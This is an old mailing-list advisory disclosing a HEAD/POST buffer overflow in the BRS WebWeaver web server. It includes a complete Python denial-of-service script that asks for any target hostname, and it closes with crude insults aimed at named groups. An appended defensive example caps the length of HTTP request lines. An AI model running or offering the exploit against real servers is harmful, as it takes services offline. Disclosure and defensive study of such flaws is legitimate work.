BRS WebWeaver: POST and HEAD Overflaws

From: euronymous (just-a-userat_private)
Date: Tue May 27 2003 - 03:45:31 PDT


    =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
    topic: BRS WebWeaver: POST and HEAD Overflaws
    product: BRS WebWeaver v1.04 and prior [ i guess ]
    vendor: www.brswebweaver.com
    risk: high
    date: 05/25/2k3
    tested platform: Windows 98 Second Edition
    discovered by: euronymous /F0KP 
    advisory urls: http://f0kp.iplus.ru/bz/025.en.txt
                   http://f0kp.iplus.ru/bz/025.ru.txt 
    contact email: euronymousat_private
    =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
    
    description
    -----------
    
    more b0fs in Webweaver. sending 32700 charz in POST
    or HEAD request will crash http server. 
    
    when sending 32699 charz with fadvWWhtdos.py, webweaver 
    prints a 403 error. when sending >= 32700 charz, the server 
    will print an `Unable to insert string' error and you
    have to restart it.
    
    }------- start of fadvWWhtdos.py ---------------{
    
    #! /usr/bin/env python
    ###
    # WebWeaver 1.04 Http Server DoS exploit 
    # by euronymous /f0kp [http://f0kp.iplus.ru]
    ########
    # Usage: ./fadvWWhtdos.py
    ########
    
    import sys
    import httplib
    
    met = raw_input("""
    What kind request you want make to crash webweaver?? [ HEAD/POST ]: 
    """)
    target = raw_input("Type your target hostname [ w/o http:// ]: ")
    spl = "f0kp"*0x1FEF
    conn = httplib.HTTPConnection(target)
    conn.request(met, "/"+spl)
    r1 = conn.getresponse()
    print r1.status
    
    }--------- end of fadvWWhtdos.py ---------------{
    
    
    shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, 
    N0b0d13s Team and all russian security guyz!! 
    to kate especially )) 
    hates: slavomira and other dirty ppl in *.kz $#%&^!  
    k0dsweb lamers team == yeah, i really __HATE__ yours!!
              
    
    ================
    im not a lame,
    not yet a hacker
    ================
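
Added example, not part of the original advisory and not vendor code: a bounded request-line reader of the kind a fronting proxy or patched server could apply, so that a HEAD or POST with an oversized target is answered with 414 before it reaches the string handling that fails at 32700 characters. The 8192-byte limit, the method allow-list and all function names are assumptions, and the sample requests are constructed.

```python
import io

MAX_REQUEST_LINE = 8192                      # assumed policy limit, in bytes
ALLOWED_METHODS = {"GET", "HEAD", "POST"}    # assumed method allow-list

def read_request_line(stream, limit=MAX_REQUEST_LINE):
    """Read one HTTP request line without buffering more than limit+1 bytes.

    Returns (status, method, target). Status 200 means "safe to hand on";
    on any rejection method and target are None.
    """
    line = stream.readline(limit + 1)        # bounded: stops at '\n' or the cap
    if len(line) > limit:
        return 414, None, None               # URI Too Long; the rest is never read
    if not line.endswith(b"\n"):
        return 400, None, None               # truncated or empty request
    parts = line.rstrip(b"\r\n").split(b" ")
    if len(parts) != 3:
        return 400, None, None
    method, target, version = (p.decode("latin-1") for p in parts)
    if not version.startswith("HTTP/1."):
        return 400, None, None
    if method not in ALLOWED_METHODS:
        return 405, None, None
    return 200, method, target

def make_request(method, path_len):
    """Constructed sample: request line whose target is '/' + path_len filler bytes."""
    return io.BytesIO(method.encode() + b" /" + b"A" * path_len + b" HTTP/1.1\r\n\r\n")

def demo():
    """Statuses for constructed requests around the lengths the advisory reports."""
    cases = [("HEAD", 10), ("POST", 32699), ("POST", 32700), ("HEAD", 32700)]
    return [(m, n, read_request_line(make_request(m, n))[0]) for m, n in cases]

if __name__ == "__main__":
    for method, n, status in demo():
        print(f"{method} with {n} filler bytes after '/' -> {status}")
```

Because the read itself is capped, the decision is made after at most limit+1 bytes, whatever length the client sends.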
    


